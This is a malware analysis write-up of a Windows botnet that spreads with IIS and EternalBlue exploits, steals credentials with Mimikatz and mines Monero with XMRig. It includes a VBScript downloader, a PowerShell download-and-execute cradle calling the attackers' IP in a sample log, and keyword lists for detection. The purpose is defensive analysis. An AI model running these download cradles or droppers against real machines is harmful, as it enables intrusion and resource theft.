Ransomware could be dwarfed by a new malware family that
effectively enslaves Windows machines into botnets to mine Monero.
It slipped under the radar, however, because it does not
encrypt and lock down files to demand Bitcoin ransoms.
Instead, the stealthy malware brings monetary gains to
attackers by discreetly mining Monero, a cryptocurrency with enhanced privacy
features compared to bitcoin. Most victims are unlikely to even know that their
Windows computers are compromised.
The only symptoms of an infection are sluggish PC and
server performance and the loss of access to shared Windows drives.
Mining cryptocurrencies is a costly investment, since it
takes a monstrous amount of computing power; hackers have therefore started
using malware that steals the computing resources of the computers it hijacks to earn
large sums in digital currency.
Cybercriminals
only modified legitimate open source Monero mining software and
exploited a known vulnerability in Microsoft IIS 6.0 to secretly install the
miner on unpatched Windows servers.
The report adds that
the attackers have been infecting unpatched Windows web servers with the
cryptocurrency miner since at least May 2017 to mine Monero, a Bitcoin-like
cryptocurrency.
The vulnerability
(CVE-2017-7269) exploited by the attackers was discovered in March 2017 by
Zhiniang Peng and Chen Wu and resides in the WebDAV service of Microsoft IIS
version 6.0—the web server in Windows Server 2003 R2.
Since the vulnerability
is in a web server, which is meant to be reachable from the internet, it can be
accessed and exploited by anyone. Unlike Bitcoin, Monero offers untraceable
transactions and is an anonymous cryptocurrency.
Another reason
hackers favour Monero is that it uses a proof-of-work algorithm called
CryptoNight, which runs well on ordinary computer or server CPUs and GPUs, whereas Bitcoin mining
requires specialised mining hardware.
Researchers say
the hacker uses a combination of old vulnerabilities and weak user/password
combinations to attack mostly old and unsupported Windows Server machines.
The most common
flaws exploited by the botnet operator include known phpMyAdmin configuration
flaws, exploits in JBoss, and bugs in Oracle Web Application Testing Suite,
MSSQL servers, ElasticSearch, Apache Tomcat, Oracle Weblogic, and other
services.
Once the hacker
gains access to a Windows Server machine, he deploys Visual Basic files to
gather information about the infected system and then installs a Remote Access
Trojan (RAT) and a cryptocurrency miner to make a huge profit from the hacked
servers.
The following image shows an overview of the entire
attack path. As the picture shows, the flow is a
complex one, since many specific artifacts are involved across the attack phases.
The initial stage starts by abusing the user's inexperience, getting him or her
to click on a first-stage file called (in my case) y1.bat.
Nowadays email is one of the vectors most favoured by attackers, and it is
easily used to deliver malicious content. Once the first stage runs,
it downloads and executes a second-stage file called info6.ps1: a
heavily obfuscated PowerShell script which de-obfuscates directly in its own
body and drops three internal resources:
- Mimikatz.dll. This module is used to steal user and administrative credentials.
- Utilities. This module is used to scan internal networks in order to propagate the infection; it runs several internal utilities such as (but not limited to) de-obfuscation routines, array ordering and exploit execution. This module is also used to drop and execute an additional file (from the same server) named info.vbs.
- Exploits. This module is a set of known exploits such as eternalblue7_exploit and eternal_blue_powershell, used from the initial stage of the attack to infect internal machines.
The last stage (info.vbs) drops and runs an executable
file which has been recognized as XMRig. XMRig is an open
source Monero CPU miner, freely available on GitHub. The infection tries to
propagate itself by scanning and attacking internal resources through the
Exploits module, while the XMRig module mines Monero cryptocurrency, giving
the attacker fresh "crypto money" by stealing the victims'
resources.
Analysis.
A romantic but still "working" .bat file is
propagated to the victim by email or message. Once the user clicks on it, the
.bat file runs the following command, which spawns a PowerShell process that
downloads and runs a script called info6.ps1 from http://118.184.48.95:8000/
Stage 1: Download and Run
The downloaded PowerShell file is clearly divided into
two macro blocks, both of them obfuscated. The following image shows the two
visual sections, which I am going to call "half up" (the section
before the "new line") and "half down" (the section after the
"new line").
Stage 2: Two visual sections to be explored
While the "half up" section clearly appears to
be a Base64-encoded text file, the "half down" section looks like it was
encoded by a custom function which, fortunately (and for certain), appears in
clear text at the end of the file. By editing that function it is possible
to modify the decoding process so that it saves the decoded text file directly
to a folder of your choice. The following image shows the decoded second-stage
"half down" section.
Decoded Second Stage "Half Down"
Analyzing the section's code, it is easy to see that
the main functions used are dynamically extracted from the file itself by
performing substring operations on the current content.
$funs=$fa.SubsTrIng(0,406492)
$mimi=$fa.sUBStrInG(406494,1131864)
$mon=$fa.suBstrING(1538360,356352)
$vcp=$fa.sUBStRiNG(1894714,880172)
$vcr=$fa.sUBstrINg(2774888,1284312)
$sc=$fa.sUBsTrinG(4059202)
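The two manual steps described above, decoding the Base64 "half up" block and then slicing the resources out of the big $fa string with Substring(start, length), can be scripted for reuse on similar droppers. The following is an added example written for this post, not code from the sample or from the author; the sample pieces, the small offsets and the CRLF separator between pieces are constructed assumptions (the real offsets 0/406492, 406494/1131864 and so on are far larger, but the two-character gap between consecutive slices is consistent with a CRLF separator). Note that the second argument of .NET's Substring is a character count, which the carve below mirrors exactly, including the one-argument form used for the final $sc slice.

```python
"""Decode the Base64 'half up' and carve the Substring(start, length) pieces
out of a dropper blob, classifying each piece by its leading bytes.
Added example; sample data and offsets are constructed, not from the sample."""
import base64
import binascii
import hashlib
from typing import Dict, List, Optional, Tuple

# Constructed stand-ins for the real modules ($funs, $mimi, $mon, $sc).
FAKE_FUNCS = "function Get-creds { param($dll, $entry) ; <# reflective loader #> }"
FAKE_DLL = (b"MZ" + bytes(58) + (0x80).to_bytes(4, "little")   # e_lfanew -> 0x80
            + bytes(64) + b"PE\0\0" + bytes(20))
FAKE_CONFIG = b"pool=pool.constructed.example:3333\n"          # Base64 but not a PE
FAKE_TAIL = "Invoke-Expression $sc"
SAMPLE_PIECES = [("funs", FAKE_FUNCS),
                 ("mimi", base64.b64encode(FAKE_DLL).decode()),
                 ("mon", base64.b64encode(FAKE_CONFIG).decode()),
                 ("sc", FAKE_TAIL)]
# A constructed 'half up' block: PowerShell usually Base64-encodes UTF-16LE.
SAMPLE_HALF_UP = base64.b64encode("$fa = $blob  # constructed".encode("utf-16-le")).decode()

Table = List[Tuple[str, int, Optional[int]]]


def decode_text_block(b64text: str) -> str:
    """Decode the Base64 'half up'.  Try UTF-16LE first when every second byte of
    the prefix is NUL (PowerShell's -EncodedCommand convention), else UTF-8."""
    raw = base64.b64decode("".join(b64text.split()))
    if raw and len(raw) % 2 == 0 and set(raw[1:64:2]) == {0}:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def build_blob(pieces: List[Tuple[str, str]], sep: str = "\r\n") -> Tuple[str, Table]:
    """Join pieces with a separator and record the (name, start, length) table the
    dropper's Substring calls would use; the last entry gets length None to
    mirror the one-argument Substring(start) used for $sc."""
    blob, table = "", []
    for name, text in pieces:
        table.append((name, len(blob), len(text)))
        blob += text + sep
    name, start, _ = table[-1]
    table[-1] = (name, start, None)
    return blob, table


def carve(blob: str, table: Table) -> Dict[str, str]:
    """Reproduce $fa.Substring(start, length).  .NET throws when the slice runs
    past the string; fail the same way so a wrong offset is noticed."""
    out: Dict[str, str] = {}
    for name, start, length in table:
        end = len(blob) if length is None else start + length
        if start > len(blob) or end > len(blob):
            raise ValueError(f"{name}: Substring({start},{length}) exceeds {len(blob)} chars")
        out[name] = blob[start:end]
    return out


def classify(piece: str) -> Dict[str, object]:
    """Plain script text, Base64 data, or a Base64-encoded PE image (MZ header and
    a valid e_lfanew pointing at 'PE\\0\\0'); returns kind, size and SHA-256."""
    if not piece:
        return {"kind": "empty", "size": 0, "sha256": ""}
    try:
        raw = base64.b64decode(piece, validate=True)
    except (binascii.Error, ValueError):
        return {"kind": "text", "size": len(piece),
                "sha256": hashlib.sha256(piece.encode()).hexdigest()}
    kind = "base64-data"
    if raw[:2] == b"MZ" and len(raw) >= 0x40:
        e_lfanew = int.from_bytes(raw[0x3C:0x40], "little")
        kind = "pe" if raw[e_lfanew:e_lfanew + 4] == b"PE\0\0" else "mz-no-pe"
    return {"kind": kind, "size": len(raw), "sha256": hashlib.sha256(raw).hexdigest()}


def analyze(blob: str, table: Table) -> Dict[str, Dict[str, object]]:
    """Carve every piece and classify it: what an analyst records before handing
    the PE pieces to a sandbox or a hash lookup."""
    return {name: classify(piece) for name, piece in carve(blob, table).items()}


if __name__ == "__main__":
    print(decode_text_block(SAMPLE_HALF_UP))
    sample_blob, sample_table = build_blob(SAMPLE_PIECES)
    for name, info in analyze(sample_blob, sample_table).items():
        print(f"{name:5s} {info['kind']:12s} {info['size']:6d} {str(info['sha256'])[:16]}")
```

Run against a real decoded blob, the table would be filled in from the Substring calls quoted above and the "pe" pieces written out for hashing; the UTF-16LE check matters because a UTF-8 decode of an encoded PowerShell block yields NUL-separated characters that defeat simple string searches.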
The content of the $fa variable, and every function related to
it, is placed in the "half up" section, which after being decoded looks
like the following image.
Decoded Second Stage "Half Up"
The second stage "half up" code is borrowed
from Kevin Robertson (Irken): the attacker reused
many useful functionalities from Irken, including the Invoke-TheHash routine,
which can be used over SMB to execute commands or to execute code directly
with special rights.
A surprisingly interesting line of code is found in the
same stage (second stage "half down"): NTLM= Get-creds mimi
mimi, where the Get-creds function (coming from the Base64-decoded
"half up") runs a DLL function by using the reflection technique. So
by definition the mimi parameter has to be a DLL file included somewhere
in the code. Let's grab it by running the following code: $fa.sUBStrInG(406494,1131864) where 406494 is the start
character and 1131864 is the number of characters (the second argument of .NET's Substring is a length, not an end offset) to be interpreted as a dynamically
loaded library. Fortunately the dropped DLL is a well-known library, widely
used in penetration testing, named Mimikatz. It is clear
that the attacker uses the Mimikatz library to grab user (and eventually
administrator) passwords. Once the password-stealing activity is done, the
malware starts to scan internal networks for known vulnerabilities such as
MS17-010. The identified exploits have been borrowed from tevora-threat and worawit, since the same pieces of
code, the same comments and the same variable names have been found. If the malware
finds a vulnerability on the local area network it tries to infect the machine by
injecting itself (info6.ps1) through EternalBlue, and then it begins its
execution from the second stage.
The VBScript contents include:
' Create the HTTP request object (the object name is truncated in the post)
Set xPost = CreateObject("Microsoft.
' Fetch the payload from the attacker's server (the URL is masked in the post)
xPost.Open "GET","http://XXXXXXXXX:
xPost.Send()
' Write the response body to disk through a binary ADODB stream
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3      ' adModeReadWrite
sGet.Type = 1      ' adTypeBinary
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "3.exe",2   ' adSaveCreateOverWrite: overwrite any existing file
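Seen from the defender's side, the chain described in this post leaves a recognisable sequence of process creations: a batch file spawning a PowerShell download cradle (stage 1), PowerShell launching a .vbs dropper (info.vbs), and a freshly written executable started with miner-style options (XMRig). The following detection logic is an added example written for this post, not code from the sample or from the author. The log lines are constructed; the field layout (timestamp|parent image|parent command line|image|command line) is an assumption, and so is the miner command line (--donate-level and stratum+tcp:// pool URLs are real XMRig/pool conventions, but the values are made up). The URL, info6.ps1, info.vbs and 3.exe come from the post.

```python
"""Process-creation detections for the bat -> PowerShell -> VBS -> miner chain.
Added example; log lines and field layout are constructed for illustration."""
import ntpath
from typing import Dict, List

# Constructed events: ts|parent image|parent cmdline|image|cmdline
SAMPLE_LOG = """\
2017-11-01T10:00:01|C:\\Windows\\System32\\cmd.exe|cmd.exe /c y1.bat|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://118.184.48.95:8000/info6.ps1')"
2017-11-01T10:00:09|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -nop -w hidden|C:\\Windows\\System32\\wscript.exe|wscript.exe C:\\Users\\Public\\info.vbs
2017-11-01T10:00:15|C:\\Windows\\System32\\wscript.exe|wscript.exe C:\\Users\\Public\\info.vbs|C:\\Users\\Public\\3.exe|3.exe -o stratum+tcp://pool.constructed.example:3333 --donate-level 1
2017-11-01T11:00:00|C:\\Windows\\explorer.exe|explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -File C:\\scripts\\backup.ps1
2017-11-01T11:05:00|C:\\Windows\\System32\\cmd.exe|cmd.exe /c build.bat|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -Command Get-Date
"""

# Download-and-run verbs typical of a PowerShell cradle (compared lower-case).
DOWNLOAD_WORDS = ("downloadstring", "downloadfile", "invoke-expression", "iex ",
                  "iex(", "net.webclient", "invoke-webrequest", "-enc")
# Miner/pool conventions: XMRig's --donate-level, stratum pool URLs, the
# CryptoNight algorithm name mentioned in the post.
MINER_WORDS = ("--donate-level", "stratum+tcp://", "cryptonight")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed log line into its five fields; the command line is
    the last field so it may itself contain '|'."""
    fields = line.rstrip("\n").split("|", 4)
    if len(fields) != 5:
        raise ValueError(f"malformed event: {line!r}")
    keys = ("ts", "parent_image", "parent_cmd", "image", "cmd")
    return dict(zip(keys, fields))


def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (possibly none)."""
    parent = ntpath.basename(ev["parent_image"]).lower()
    image = ntpath.basename(ev["image"]).lower()
    cmd = ev["cmd"].lower()
    hits: List[str] = []
    # R1: cmd.exe (a batch file) spawning PowerShell with a URL and a download verb
    if (parent == "cmd.exe" and image == "powershell.exe"
            and "http" in cmd and any(w in cmd for w in DOWNLOAD_WORDS)):
        hits.append("R1-bat-powershell-cradle")
    # R2: a scripting host running a .vbs that a shell or PowerShell launched
    if image in SCRIPT_HOSTS and ".vbs" in cmd and parent in SHELLS:
        hits.append("R2-script-drops-vbs")
    # R3: any process started with miner/pool style options
    if any(w in cmd for w in MINER_WORDS):
        hits.append("R3-miner-options")
    return hits


def detect(log_text: str) -> List[Dict[str, str]]:
    """Run every rule over every line and collect alerts in log order."""
    alerts: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in match_rules(ev):
            alerts.append({"rule": rule, "ts": ev["ts"], "image": ev["image"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['rule']:26s} {alert['image']}")
```

The two benign lines (an interactive PowerShell started from Explorer, and a build batch file that only runs Get-Date) produce no alerts, which is the point of requiring both a URL and a download verb in R1 rather than alerting on every cmd.exe to powershell.exe transition; in practice R3 would be paired with the sustained CPU usage the post names as the only visible symptom.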